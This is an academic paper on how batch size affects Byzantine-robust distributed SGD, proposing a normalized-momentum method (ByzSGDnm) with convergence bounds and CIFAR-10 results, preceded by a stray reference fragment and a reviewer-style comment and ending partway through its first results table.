Satyapriya Krishna, Jiaqi Ma, Dylan Slack, Asma Ghandeharioun, Sameer Singh, and Himabindu Lakkaraju. Post hoc explanations of language models can improve language models. arXiv, 2023. Jinhyuk Lee, Wonjin Yoon, Sungdong Kim, Donghyeon Kim, Sunkyu Kim, Chan Ho So, and Jaewoo Kang. Biobert: a pre-trained biomedical language representation model for biomedical text mining. Bioinformatics, 2020. Nelson F Liu, Kevin Lin, John Hewitt, Ashwin Paranjape, Michele Bevilacqua, Fabio Petroni, and Percy Liang. Lost in the middle: How language models use long contexts. arXiv, 2023a. Pengfei Liu, Weizhe Yuan, Jinlan Fu, Zhengbao Jiang, Hiroaki Hayashi, and Graham Neubig. Pre-train, prompt, and predict: A systematic survey of prompting methods in natural language processing. ACM Computing Surveys, 2023b. Scott M Lundberg and Su-In Lee. A unified approach to interpreting model predictions. In NeurIPS, 2017.
wriKDQqiOQ
As far as I know, the speed gain obtained by choosing a larger batch size is naturally explained by the fact that we can benefit from the parallelization of computations (on the systems side). However, I would find it interesting to understand whether the presented methods reach a given accuracy faster when using a larger batch size.
ON THE EFFECT OF BATCH SIZE IN BYZANTINE-ROBUST DISTRIBUTED LEARNING

Yi-Rui Yang, Chang-Wei Shi, Wu-Jun Li∗
National Key Laboratory for Novel Software Technology, Department of Computer Science and Technology, Nanjing University, Nanjing, China
{yangyr, shicw}@mail.nju.edu.cn, [email protected]
∗Corresponding author.

ABSTRACT

Byzantine-robust distributed learning (BRDL), in which computing devices are likely to behave abnormally due to accidental failures or malicious attacks, has recently become a hot research topic. However, even in the independent and identically distributed (i.i.d.) case, existing BRDL methods suffer a significant drop in model accuracy due to the large variance of stochastic gradients. Increasing the batch size is a simple yet effective way to reduce this variance. However, when the total number of gradient computations is fixed, a too-large batch size leads to a too-small iteration number (update number), which may also degrade model accuracy. In view of this challenge, we mainly study the effect of batch size when the total number of gradient computations is fixed. In particular, we show that when the total number of gradient computations is fixed, the optimal batch size corresponding to the tightest theoretical upper bound in BRDL increases with the fraction of Byzantine workers. Therefore, compared to the case without attacks, a larger batch size is preferred when under Byzantine attacks. Motivated by this theoretical finding, we propose a novel method called Byzantine-robust stochastic gradient descent with normalized momentum (ByzSGDnm) to further increase model accuracy in BRDL. We theoretically prove the convergence of ByzSGDnm for general non-convex cases under Byzantine attacks. Empirical results show that when under Byzantine attacks, using a relatively large batch size can significantly increase model accuracy, which is consistent with our theoretical results. Moreover, ByzSGDnm can achieve higher model accuracy than existing BRDL methods when under deliberately crafted attacks. In addition, we empirically show that increasing the batch size has the bonus of training acceleration.

1 INTRODUCTION

Distributed learning has attracted much attention (Haddadpour et al., 2019; Jaggi et al., 2014; Lee et al., 2017; Lian et al., 2017; Ma et al., 2015; Shamir et al., 2014; Sun et al., 2018; Yang, 2013; Yu et al., 2019a;b; Zhao et al., 2017; 2018; Zhou et al., 2018; Zinkevich et al., 2010) for years due to its wide application. In traditional distributed learning, it is typically assumed that there is no failure or attack. However, in some real-world applications such as edge computing (Shi et al., 2016) and federated learning (McMahan & Ramage, 2017), the service provider (also known as the server) usually has weak control over the computing nodes (also known as workers). In these cases, various software and hardware failures may happen on workers (Xie et al., 2019). Worse even, some workers may get hacked by a malicious third party and intentionally send wrong information to foil the distributed learning process (Kairouz et al., 2021). The workers under failure or attack are also called Byzantine workers.
Distributed learning with the existence of Byzantine workers, which is also known as Byzantine-robust distributed learning (BRDL), has recently become a hot research topic (Bernstein et al., 2019; Bulusu et al., 2021; Chen et al., 2018; Damaskinos et al., 2018; Diakonikolas et al., 2017; Diakonikolas & Kane, 2019; Konstantinidis & Ramamoorthy, 2021; Lamport et al., 2019; Rajput et al., 2019; Sohn et al., 2020; Wu et al., 2020; Yang & Li, 2021; 2023; Yang et al., 2020; Yin et al., 2019). A typical way to obtain Byzantine robustness is to substitute the mean aggregator with a robust aggregator such as Krum (Blanchard et al., 2017), geometric median (Chen et al., 2017), coordinate-wise median (Yin et al., 2018), centered clipping (Karimireddy et al., 2021), and so on. However, when there are Byzantine workers, even if robust aggregators are used, an aggregation error is inevitably introduced, namely the difference between the aggregated result and the true mean value. Furthermore, even in the independent and identically distributed (i.i.d.) case, the aggregation error can be large due to the large variance of the stochastic gradients (Karimireddy et al., 2021), which are the typical values sent from workers to the server for parameter updating. A large aggregation error can make BRDL methods fail (Xie et al., 2020).

It has been shown in existing works that the variance of the values sent from non-Byzantine workers can be reduced by using local momentum on the workers (Allen-Zhu et al., 2020; El-Mhamdi et al., 2021; Farhadkhani et al., 2022; Karimireddy et al., 2021). However, as the empirical results in our work will show, even if local momentum is used, existing BRDL methods suffer a significant drop in model accuracy when under attack. Therefore, more sophisticated techniques are required to further reduce the variance of stochastic gradients. Increasing the batch size is a simple yet effective way to reduce the variance. However, when the total number of gradient computations is fixed, a too-large batch size leads to a too-small iteration number (update number), which may also degrade model accuracy (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; You et al., 2020; Zhao et al., 2020; 2023). In view of this challenge, we mainly study the effect of batch size in i.i.d. cases when the total number of gradient computations is fixed. The main contributions of this work are listed as follows:

- We show that when the total number of gradient computations is fixed, the optimal batch size corresponding to the tightest theoretical upper bound in BRDL increases with the fraction of Byzantine workers.
- Motivated by this theoretical finding, we propose a novel method called Byzantine-robust stochastic gradient descent with normalized momentum (ByzSGDnm) in order to further increase model accuracy in BRDL.
- We theoretically prove the convergence of ByzSGDnm for non-convex cases under attacks.
- We empirically show that when under Byzantine attacks, compared to the case of a small batch size, setting a relatively large batch size can significantly increase model accuracy. Moreover, ByzSGDnm can achieve higher model accuracy than existing BRDL methods when under deliberately crafted attacks.
- In addition, increasing the batch size has the bonus of training acceleration, which is verified by our empirical results.
2 PRELIMINARY

In this paper, we mainly focus on the following optimization problem:

$$\min_{w \in \mathbb{R}^d} F(w) = \mathbb{E}_{\xi \sim D}[f(w, \xi)], \tag{1}$$

where $w \in \mathbb{R}^d$ is the model parameter and $D$ is the distribution of the training data. In addition, we mainly focus on the widely used parameter-server (PS) framework in this work, where $m$ computing nodes (workers) collaborate to train the learning model under the coordination of a central server. Each worker can independently draw samples $\xi$ from the data distribution $D$. That is to say, we focus on i.i.d. cases in this paper. Moreover, among the $m$ workers, a fraction $\delta$ of the workers are Byzantine, which may behave abnormally and send arbitrary values to the server due to accidental failures or malicious attacks. The other workers, which are called non-Byzantine workers, faithfully conduct the training algorithm without any fault. Formally, we use $G \subseteq \{1, 2, \ldots, m\}$ to denote the index set of non-Byzantine workers, where $|G| = (1 - \delta)m$. The server has no access to any training data and does not know which workers are Byzantine.

In this work, we mainly consider loss functions that satisfy the following three assumptions, which are quite common in distributed learning. For simplicity, we use the notation $\|\cdot\|$ to denote the Euclidean norm of a vector.

**Assumption 1 (Bounded variance).** There exists $\sigma \geq 0$ such that $\mathbb{E}_{\xi \sim D}\|\nabla f(w, \xi) - \nabla F(w)\|^2 \leq \sigma^2$ for all $w \in \mathbb{R}^d$.

**Assumption 2 (Lower bound of \( F(\cdot) \)).** There exists \( F^* \in \mathbb{R} \) such that \( F(w) \geq F^* \) for all \( w \in \mathbb{R}^d \).

**Assumption 3 (\( L \)-smoothness).** The loss function \( F(\cdot) \) is differentiable everywhere on \( \mathbb{R}^d \). Moreover,
\[ \| \nabla F(w) - \nabla F(w') \| \leq L \| w - w' \| \quad \text{for all } w, w' \in \mathbb{R}^d. \]

A typical and widely used algorithm to solve the optimization problem (1) with potential Byzantine workers is Byzantine-robust stochastic gradient descent with momentum (ByzSGDm) (Farhadkhani et al., 2022; Karimireddy et al., 2021). Compared with vanilla stochastic gradient descent with momentum (SGDm), the main difference in ByzSGDm is that the mean aggregator on the server is substituted by a robust aggregator. Specifically, in ByzSGDm, the server updates the model parameter at the \( t \)-th iteration by computing
\[ w_{t+1} = w_t - \eta_t \cdot \text{Agg}(u^{(1)}_t, \ldots, u^{(m)}_t), \]
where \( \eta_t \) is the learning rate and \( \text{Agg}(\cdot) \) is a robust aggregator. The local momentum \( u^{(k)}_t \) is received from the \( k \)-th worker \( (k = 1, 2, \ldots, m) \). For each non-Byzantine worker \( k \in G \),
\[ u^{(k)}_t = \begin{cases} g^{(k)}_0, & t = 0; \\ \beta u^{(k)}_{t-1} + (1 - \beta) g^{(k)}_t, & t > 0, \end{cases} \]
where \( \beta \) is the momentum hyper-parameter and \( g^{(k)}_t = \frac{1}{B} \sum_{b=1}^{B} \nabla f(w_t, \xi^{(k,b)}_t) \) is the mean value of a mini-batch of stochastic gradients with batch size \( B \). For each Byzantine worker \( k \in [m] \setminus G \), \( u^{(k)}_t \) can be an arbitrary value. For space saving, more details about ByzSGDm are provided in Algorithm 2 and Algorithm 3 in Appendix A.
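For intuition, one ByzSGDm iteration can be sketched as follows (a minimal illustration, not the authors' implementation; `agg` stands for any robust aggregator, and Byzantine entries of `momenta` may be arbitrary):

```python
import torch

def byzsgdm_step(w, momenta, grads, agg, lr, beta=0.9):
    """One server iteration of ByzSGDm: workers refresh their local momenta
    with mini-batch gradients, the server robustly aggregates and steps."""
    for k, g in enumerate(grads):  # honest workers; Byzantine ones send anything
        momenta[k] = beta * momenta[k] + (1.0 - beta) * g
    u = agg(momenta)               # robust aggregation replaces the plain mean
    return w - lr * u, momenta

def coordinate_wise_median(vectors):
    """A simple robust aggregator: the coordinate-wise median of the inputs."""
    return torch.median(torch.stack(vectors), dim=0).values
```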
For a ‘good’ aggregator, the aggregated result \( \text{Agg}(u^{(1)}_t, \ldots, u^{(m)}_t) \) should be close to the true mean of the momenta on non-Byzantine workers, which can be written as \( \frac{1}{|G|} \sum_{k \in G} u^{(k)}_t \). To quantitatively characterize a robust aggregator, the definition of a \( (\delta_{\max}, c) \)-robust aggregator has been proposed in existing works (Karimireddy et al., 2021), which we restate in Definition 1 below.

**Definition 1** (\( (\delta_{\max}, c) \)-robust aggregator (Karimireddy et al., 2021)). Let \( 0 \leq \delta_{\max} < \frac{1}{2} \) and \( c \geq 0 \). Random vectors \( x_1, \ldots, x_m \in \mathbb{R}^d \) satisfy \( \mathbb{E}\|x_k - x_{k'}\|^2 \leq \rho^2 \) for all fixed \( k, k' \in G \), where \( G \subseteq \{1, \ldots, m\} \) and \( |G| = (1 - \delta)m \). An aggregator \( \text{Agg}(\cdot) \) is called a \( (\delta_{\max}, c) \)-robust aggregator if we always have
\[ \mathbb{E}\|e\|^2 \leq c \delta \rho^2 \]
when \( \delta \leq \delta_{\max} \). Here, \( e = \text{Agg}(x_1, \ldots, x_m) - \frac{1}{|G|} \sum_{k \in G} x_k \) is called the aggregation error.

In addition, it has been proved that for any potential robust aggregator, there is inevitably an aggregation error of \( \Omega(\delta \rho^2) \) in the worst case (Karimireddy et al., 2021). It has also been proved that some existing aggregators, such as centered clipping (Karimireddy et al., 2021), satisfy Definition 1.

3 METHODOLOGY

3.1 EFFECT OF BATCH SIZE ON CONVERGENCE

As shown in existing works on Byzantine-robust distributed learning (Blanchard et al., 2017; Chen et al., 2017; Li et al., 2019; Yin et al., 2018), even if robust aggregators are used, there is typically a drop in model accuracy under Byzantine attacks due to the aggregation error. Therefore, we attempt to alleviate this drop in model accuracy by reducing the aggregation error. According to Definition 1, there are three variables related to the upper bound on the aggregation error. The fraction of Byzantine workers \( \delta \) is determined by the problem and can hardly be reduced. The constant \( c \) is mainly related to the specific robust aggregator, and many works (Blanchard et al., 2017; Chen et al., 2017; Karimireddy et al., 2021; Li et al., 2019; Yin et al., 2018) have proposed various robust aggregators. In this work, we mainly attempt to reduce \( \rho \).

Moreover, we focus on the i.i.d. setting in this work. Since \( \mathbb{E}[x_k] = \mathbb{E}[x_{k'}] \) in this case and \( x_k, x_{k'} \) are independent for \( k \neq k' \), by Assumption 1 we have
\[ \mathbb{E}\|x_k - x_{k'}\|^2 = \mathbb{E}\|(x_k - \mathbb{E}[x_k]) - (x_{k'} - \mathbb{E}[x_{k'}])\|^2 = \mathbb{E}\|x_k - \mathbb{E}[x_k]\|^2 + \mathbb{E}\|x_{k'} - \mathbb{E}[x_{k'}]\|^2 \leq 2\sigma^2, \tag{2} \]
which implies that \( \rho^2 \leq 2\sigma^2 \) in i.i.d. cases under Assumption 1. Therefore, we can reduce \( \rho \) by reducing the variance \( \sigma^2 \) in i.i.d. cases. A simple but effective way to reduce the variance is to increase the batch size on each worker, which is denoted by \( B \) in this paper. For simplicity, we assume that all workers adopt the same batch size in this work. Compared to the case with batch size 1, the variance of the stochastic gradients is reduced to \( 1/B \) of the original if the batch size is set to \( B \). However, to keep the total number of gradient computations unchanged, the total iteration number is also reduced to \( 1/B \) of the original, leading to fewer model updates.
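The \( 1/B \) variance reduction invoked above is easy to verify numerically; the snippet below is a purely illustrative one-dimensional check on synthetic Gaussian 'gradient noise' (not part of the paper's experiments):

```python
import numpy as np

# The mini-batch mean of B i.i.d. stochastic gradients has variance sigma^2 / B.
rng = np.random.default_rng(0)
sigma = 2.0
for B in [1, 8, 64]:
    batch_means = rng.normal(0.0, sigma, size=(100_000, B)).mean(axis=1)
    print(B, round(batch_means.var(), 4))  # approx. 4.0, 0.5, 0.0625
```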
Formally, we use \( C = TBm(1 - \delta) \) to denote the total number of gradient computations on non-Byzantine workers, where \( T \) is the total iteration number. Thus, we have \( T = \frac{C}{Bm(1 - \delta)} \), which implies that a larger batch size \( B \) leads to a smaller total iteration number \( T \) when the total number of gradient computations \( C \) is fixed. In many BRDL applications with deep learning models, \( C \) can be used to approximately evaluate the computation cost, since the cost of robust aggregation and model updating is negligible compared to that of gradient computation.

We first recall the convergence of ByzSGDm, which has been adequately studied in existing works (Karimireddy et al., 2021). We restate the convergence results of ByzSGDm in Theorem 1 below. For space saving, the details of how Theorem 1 is obtained from existing results (Karimireddy et al., 2021) are presented in Appendix B.

**Theorem 1** (Convergence of ByzSGDm (Karimireddy et al., 2021)). Suppose that \( F(w_0) - F^* \leq F_0 \). Under Assumptions 1, 2, and 3, when \( \text{Agg}(\cdot) \) is \( (\delta_{\max}, c) \)-robust and \( \delta \leq \delta_{\max} \), setting \( \eta_t = \eta = \min \left( \sqrt{\frac{F_0 + \frac{5c\delta m}{8L}}{20LT\sigma^2}}, \frac{1}{8L} \right) \) and \( 1 - \beta = 8L\eta \), we have the following result for ByzSGDm:
\[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E}\|\nabla F(w_t)\|^2 \leq 16\sqrt{\frac{\sigma^2(1 + c\delta m)}{TBm}} \left( \sqrt{10LF_0} + \sqrt{\frac{3c\delta \sigma^2}{B}} \right) + \frac{32LF_0}{T} + \frac{20\sigma^2(1 + c\delta m)}{TBm}. \tag{3} \]

When \( C \) is fixed, inequality (3) can be rewritten as \( \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E}\|\nabla F(w_t)\|^2 \leq U(B) \) since \( T = \frac{C}{Bm(1 - \delta)} \), where \( U(B) \) is a real-valued function of the batch size \( B \). Specifically,
\[ U(B) = 16\sqrt{\frac{\sigma^2(1 + c\delta m)(1 - \delta)}{C}} \left( \sqrt{10LF_0} + \sqrt{\frac{3c\delta \sigma^2}{B}} \right) + \frac{32LF_0Bm(1 - \delta)}{C} + \frac{20\sigma^2(1 + c\delta m)(1 - \delta)}{C}. \]

Please note that \( U(B) \) is originally defined on the set of positive integers \( \mathbb{N}^+ \), since \( B \) denotes the batch size. We here extend the definition of \( U(B) \) to \( B \in (0, +\infty) \) for simplicity. The results will be interpreted back on \( B \in \mathbb{N}^+ \) at the end of our analysis. We then attempt to find the optimal batch size \( B^* \) that minimizes the theoretical upper bound \( U(B) \) when \( C = TBm(1 - \delta) \) is fixed. Formally, \( B^* \) is defined by the following optimization problem:
\[ B^* = \arg\min_{B \in (0, +\infty)} U(B). \]

We present Proposition 1 below, which provides an explicit expression for \( B^* \). Please refer to Appendix B for the proof details.

**Proposition 1.** \( U(B) \) is strictly convex on \( (0, +\infty) \). Moreover, when \( \delta > 0 \), we have
\[ B^* = \left( \frac{3}{16L^2(F_0)^2m} \right)^{\frac{1}{3}} \left( \frac{c\delta(1 + c\delta m)}{m(1 - \delta)} \right)^{\frac{1}{3}} \sigma^{\frac{4}{3}}C^{\frac{1}{3}}, \tag{4} \]
and
\[ U(B^*) = \frac{16\sqrt{10LF_0(1 + c\delta m)(1 - \delta)}\,\sigma}{C^{\frac{1}{2}}} + \frac{24\left[12c\delta(1 + c\delta m)(1 - \delta)^2LF_0m\right]^{\frac{1}{3}}\sigma^{\frac{4}{3}}}{C^{\frac{2}{3}}} + \frac{20(1 + c\delta m)(1 - \delta)\sigma^2}{C}. \]
**Algorithm 1** Byzantine-Robust SGD with Normalized Momentum (ByzSGDnm)

Input: initial model parameter \( w_0 \), worker number \( m \), iteration number \( T \), learning rates \( \{ \eta_t \}_{t=0}^{T-1} \), batch size \( B \), momentum hyper-parameter \( \beta \in [0, 1) \), robust aggregator \( \text{Agg}(\cdot) \);
for \( t = 0 \) to \( T - 1 \) do
  Broadcast \( w_t \) to all workers;
  on worker \( k \in \{1, \ldots, m\} \) in parallel do
    Receive \( w_t \) from the server;
    Independently draw \( B \) samples \( \xi_t^{(k,1)}, \ldots, \xi_t^{(k,B)} \) from distribution \( D \);
    Compute \( g_t^{(k)} = \frac{1}{B} \sum_{b=1}^{B} \nabla f(w_t, \xi_t^{(k,b)}) \);
    Update the local momentum \( u_t^{(k)} = \begin{cases} g_0^{(k)}, & t = 0; \\ \beta u_{t-1}^{(k)} + (1 - \beta) g_t^{(k)}, & t > 0; \end{cases} \)
    Send \( u_t^{(k)} \) to the server (Byzantine workers may send arbitrary values at this step);
  end on worker
  Receive \( \{u_t^{(k)}\}_{k=1}^{m} \) from the \( m \) workers, and compute \( u_t = \text{Agg}(u_t^{(1)}, \ldots, u_t^{(m)}) \);
  Update the model parameter with the normalized momentum: \( w_{t+1} = w_t - \eta_t \frac{u_t}{\|u_t\|} \);
end for
Output model parameter \( w_T \).

Please note that \( U(B) \) has no more than one global minimizer due to its strict convexity. Thus, \( B^* \) is well-defined when \( \delta > 0 \). Furthermore, the term \( \left( \frac{c \delta (1 + c \delta m)}{m (1 - \delta)} \right)^{\frac{1}{3}} \) in (4) is monotonically increasing with respect to \( \delta \). This implies that when the total number of gradient computations on non-Byzantine workers \( C = TBm(1 - \delta) \) is fixed, \( B^* \) increases as the fraction of Byzantine workers \( \delta \) increases.

We then interpret the above results back on \( B \in \mathbb{N}^+ \). Due to the strict convexity, \( U(B) \) is monotonically decreasing on \( (0, B^*) \) and monotonically increasing on \( (B^*, +\infty) \). Thus, the optimal integer batch size that minimizes \( U(B) \) equals either \( \lfloor B^* \rfloor \) or \( \lfloor B^* \rfloor + 1 \), which also increases with \( \delta \). The notation \( \lfloor B^* \rfloor \) represents the largest integer that is not larger than \( B^* \). This conclusion will be further supported by the empirical results in Section 5.

Meanwhile, although \( B^* \to 0 \) as \( \delta \to 0^+ \), this should not be interpreted as recommending a batch size close to 0 when there is no attack. In fact, since \( C \) is fixed, a too-small batch size \( B \) implies a too-large iteration number \( T \), which leads to a large communication cost. Moreover, the computation power of some devices (e.g., GPUs) is not effectively utilized when \( B \) is too small. Thus, the setting of \( B \) is a trade-off between model accuracy and running time when \( \delta = 0 \), which has been studied for years (Goyal et al., 2017; You et al., 2020; Zhao et al., 2020; 2023). In addition, please note that although a smaller \( U(B) \) does not necessarily ensure better empirical performance, given the complexity and variety of real-world applications, it provides a better worst-case guarantee.

3.2 BYZANTINE-ROBUST SGD WITH NORMALIZED MOMENTUM

Proposition 1 shows that the optimal batch size \( B^* \) that minimizes \( U(B) \) increases with the fraction of Byzantine workers. Hence, a relatively large batch size is preferred when under Byzantine attacks.
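To make Algorithm 1 concrete, a minimal sketch of one ByzSGDnm iteration is given below (our own illustration with an assumed aggregator interface, not the authors' code; the small epsilon guards against division by zero and is not part of Algorithm 1):

```python
import torch

def byzsgdnm_step(w, momenta, grads, agg, lr, beta=0.9):
    """One ByzSGDnm iteration: identical to ByzSGDm except that the
    robustly aggregated momentum is normalized before the update."""
    for k, g in enumerate(grads):  # non-Byzantine workers update their momenta
        momenta[k] = beta * momenta[k] + (1.0 - beta) * g
    u = agg(momenta)               # robust aggregation, e.g. centered clipping
    u = u / (u.norm() + 1e-12)     # normalize the whole momentum vector
    return w - lr * u, momenta
```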
In existing works on traditional large-batch training without attacks (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; Zhao et al., 2020; 2023), the normalization technique is widely used to increase model accuracy. Motivated by this, we propose a novel method called Byzantine-robust stochastic gradient descent with normalized momentum (ByzSGDnm) by introducing a simple normalization operation. Specifically, in ByzSGDnm, the model parameters are updated by:
\[ w_{t+1} = w_t - \eta_t \cdot \frac{\text{Agg}(u_t^{(1)}, \ldots, u_t^{(m)})}{\|\text{Agg}(u_t^{(1)}, \ldots, u_t^{(m)})\|}. \]
The details of ByzSGDnm are illustrated in Algorithm 1. Please note that some existing methods use layer-wise normalization (You et al., 2020). However, these methods may suffer from degradation of model accuracy without additional training tricks such as warm-up (Zhao et al., 2023). Furthermore, as shown in (Zhao et al., 2023), layer-wise (block-wise) normalization may slow down the convergence rate. Hence, we follow the practice of performing normalization on the whole momentum (Zhao et al., 2020; 2023; Cutkosky & Mehta, 2020). Moreover, please note that the purpose of traditional large-batch training (Goyal et al., 2017; You et al., 2020; Zhao et al., 2020; 2023) is mainly to accelerate the training process by reducing the communication cost and utilizing the computation power more effectively. In this work, however, the main purpose of increasing the batch size and using momentum normalization is to enhance Byzantine robustness and increase model accuracy under Byzantine attacks. The acceleration effect of adopting a large batch size is viewed as a bonus in this work. Please refer to Section 5 for the empirical results on the wall-clock time of ByzSGDm and ByzSGDnm with different batch sizes.

4 CONVERGENCE

In this section, we theoretically analyze the convergence of ByzSGDnm under Assumptions 1, 2, and 3, which are common in distributed learning. For space saving, we only present the main results here. Please refer to Appendix B for the proof details.

**Theorem 2.** Suppose that \( F(w_0) - F^* \leq F_0 \) and let \( \alpha = 1 - \beta \). Under Assumptions 1, 2, and 3, when \( \text{Agg}(\cdot) \) is \( (\delta_{\max}, c)\)-robust, \( \delta \leq \delta_{\max} \), and \( \eta_t = \eta \), we have the following result for ByzSGDnm:
\[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E} \| \nabla F(w_t) \| \leq \frac{2F_0}{\eta T} + \frac{10\eta L}{\alpha} + \frac{9\sqrt{2cm\delta(1-\delta)} + 9}{\sqrt{Bm(1-\delta)}} \left( \frac{1}{\alpha T} + \sqrt{\alpha} \right) \sigma. \]

Finally, we show that when the learning rate \( \eta \) and the momentum hyper-parameter \( \beta = 1 - \alpha \) are properly set, ByzSGDnm achieves a convergence order of \( O\left(\frac{1}{T^{\frac{1}{4}}}\right) \), as stated in Proposition 2 below.

**Proposition 2.** Under Assumptions 1, 2, and 3, when \( \text{Agg}(\cdot) \) is \( (\delta_{\max}, c)\)-robust and \( \delta \leq \delta_{\max} \), setting \( 1 - \beta = \alpha = \min \left( \frac{\sqrt{80LF_0Bm(1-\delta)}}{\left(9\sqrt{2cm\delta(1-\delta)} + 9\right)\sigma \sqrt{T}},\ 1 \right) \) and \( \eta_t = \eta = \sqrt{\frac{\alpha F_0}{5LT}} \), we have
\[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E} \| \nabla F(w_t) \| \leq 6 \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{1}{2}} \left( \frac{5LF_0\sigma^2}{TBm(1-\delta)} \right)^{\frac{1}{4}} + 12 \sqrt{\frac{5LF_0}{T}} + \frac{27\sigma^2}{4\sqrt{5TB^2m^2(1-\delta)^2LF_0}}. \tag{5} \]
Moreover, when \( C = TBm(1-\delta) \) is fixed, the optimal batch size \( \tilde{B}^* \) that minimizes the right-hand side of (5) is \( \tilde{B}^* = \frac{9\left[\sqrt{2cm\delta(1-\delta)} + 1\right]}{80m(1-\delta)LF_0} \sigma^2 \). In this case \( (B = \tilde{B}^*) \), we have:
\[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E} \| \nabla F(w_t) \| \leq 6 \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{1}{2}} \left( \frac{5LF_0\sigma^2}{C} \right)^{\frac{1}{4}} + \frac{18\left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{3}{4}} \sigma}{C^{\frac{1}{2}}}. \]

Inequality (5) illustrates that after \( T \) iterations, ByzSGDnm guarantees that
\[ \min_{t=0,\ldots,T-1} \mathbb{E} \| \nabla F(w_t) \| \leq O \left( \frac{(LF_0)^{\frac{1}{4}} \sqrt{\sigma}}{T^{\frac{1}{4}}} + \frac{1}{T^{\frac{1}{2}}} \right). \]
Therefore, ByzSGDnm has the same convergence order as vanilla SGD with normalized momentum (Cutkosky & Mehta, 2020) without attacks. The extra factor \( \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{3}{4}}/(1-\delta)^{\frac{1}{4}} \) on the right-hand side (RHS) of (5) is due to the existence of Byzantine workers and increases with \( \delta \). The extra factor vanishes (equals 1) when there is no Byzantine worker (\( \delta = 0 \)). Moreover, it has been shown in existing works (Arjevani et al., 2023; Cutkosky & Mehta, 2020) that under Assumptions 1, 2, and 3, the convergence order \( O(1/T^{\frac{1}{4}}) \) is optimal for SGD. Byz-VR-MARINA (Gorbunov et al., 2023) achieves a better convergence order by intermittently using full gradients. However, full gradients are computationally expensive, especially in real-world applications with a large number of training instances. We compare ByzSGDnm with Byz-VR-MARINA in detail in Appendix D, where the empirical results show that ByzSGDnm significantly outperforms Byz-VR-MARINA. In addition, \( \tilde{B}^* \) also increases with \( \delta \), since both \( \delta(1-\delta) \) and \( \frac{1}{1-\delta} \) increase with \( \delta \) when \( \delta \in [0, \frac{1}{2}) \).

The analysis in this paper is based on the definition of a \((\delta_{\text{max}}, c)\)-robust aggregator (Definition 1). There is also another criterion for robust aggregators in existing works, called \((f, \kappa)\)-robustness (Allouah et al., 2023). Similar results can be obtained under \((f, \kappa)\)-robustness. Please refer to Appendix C for more details.

5 EXPERIMENT

**Task and platform.** In this section, we empirically test the performance of ByzSGDm and ByzSGDnm on image classification tasks. Each algorithm is used to train a ResNet-20 (He et al., 2016) deep learning model on the CIFAR-10 dataset (Krizhevsky et al., 2009). All the experiments presented in this work are conducted on a distributed platform with 9 dockers, each bound to an NVIDIA TITAN Xp GPU. One docker is chosen as the server while the other 8 dockers serve as workers. The training instances are randomly and equally distributed to the workers.

**Experimental settings.** In existing works on BRDL (Allouah et al., 2023; Karimireddy et al., 2021; 2022), the batch size is typically set to 32 or 50 on the CIFAR-10 dataset. Therefore, we set ByzSGDm (Karimireddy et al., 2021) with batch size 32 as the baseline, and compare the performance of ByzSGDm with different batch sizes (ranging from 64 to 1024) to the baseline under the ALIE attack (Baruch et al., 2019).
In our experiments, we use four widely used robust aggregators for ByzSGDm: Krum (KR) (Blanchard et al., 2017), geometric median (GM) (Chen et al., 2017), coordinate-wise median (CM) (Yin et al., 2018), and centered clipping (CC) (Karimireddy et al., 2021). Moreover, we set the clipping radius to 0.1 for CC. We train the model for 160 epochs with cosine annealing learning rates (Loshchilov & Hutter, 2017). Specifically, the learning rate at the \(i\)-th epoch is \(\eta_i = \frac{\eta_0}{2} (1 + \cos(\frac{i\pi}{159}))\) for \(i = 0, 1, \ldots, 159\). The initial learning rate \(\eta_0\) is selected from \{0.1, 0.2, 0.5, 1.0, 2.0, 5.0, 10.0, 20.0\}, and the best final top-1 test accuracy is used as the final metric. The momentum hyper-parameter \(\beta\) is set to 0.9. Please note that the total number of gradient computations on non-Byzantine workers \(C\) is independent of the batch size. Specifically, \(C = 160 \times 50000 \times (1 - \delta)\), since we train the model for 160 epochs with 50000 training instances.

**Evaluation on the effect of batch size.** We first evaluate the performance of ByzSGDm with different batch sizes when the fraction of Byzantine workers \(\delta\) is 0 (no attack), \(\frac{1}{8}\), and \(\frac{3}{8}\), respectively. As the results in Table 1 and Table 2 show, the batch size corresponding to the best top-1 accuracy increases with \(\delta\), which is consistent with our theoretical results. Moreover, when \(\delta = \frac{3}{8}\), using a relatively large batch size greatly increases the test accuracy. Meanwhile, the test accuracy decreases with the batch size when there is no attack (\(\delta = 0\)), which is consistent with existing works (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; You et al., 2020; Zhao et al., 2020; 2023).
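For reference, the cosine-annealing schedule used above is straightforward to implement (a sketch matching the formula in the experimental settings):

```python
import math

def cosine_lr(i, eta0, num_epochs=160):
    """Learning rate at epoch i: eta_i = eta0/2 * (1 + cos(i*pi/(num_epochs-1)))."""
    return eta0 / 2.0 * (1.0 + math.cos(i * math.pi / (num_epochs - 1)))

# cosine_lr(0, 0.1) == 0.1, and cosine_lr(159, 0.1) is numerically 0.0
```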
Table 1: The final top-1 test accuracy of ByzSGDm with various batch sizes under the ALIE attack when Krum (KR) and geometric median (GM) are used as the robust aggregator

ByzSGDm with KR:

| Batch size | \(\delta = 0\) | \(\delta = 1/8\) | \(\delta = 3/8\) |
|------------|----------------|------------------|------------------|
| 32×8 (baseline) | **91.08%** | 55.84% | 38.55% |
| 64×8 | 89.98% (-1.10%) | 63.22% (+7.38%) | 54.15% (+15.60%) |
| 128×8 | 89.71% (-1.37%) | 75.06% (+19.22%) | 55.98% (+17.43%) |
| 256×8 | 89.15% (-1.93%) | 84.47% (+28.63%) | 59.28% (+20.73%) |
| 512×8 | 86.15% (-4.93%) | **85.68%** (+29.84%) | 83.42% (+44.87%) |
| 1024×8 | 84.97% (-6.11%) | 83.48% (+27.64%) | **83.45%** (+44.90%) |

ByzSGDm with GM:

| Batch size | \(\delta = 0\) | \(\delta = 1/8\) | \(\delta = 3/8\) |
|------------|----------------|------------------|------------------|
| 32×8 (baseline) | **92.02%** | 83.81% | 63.11% |
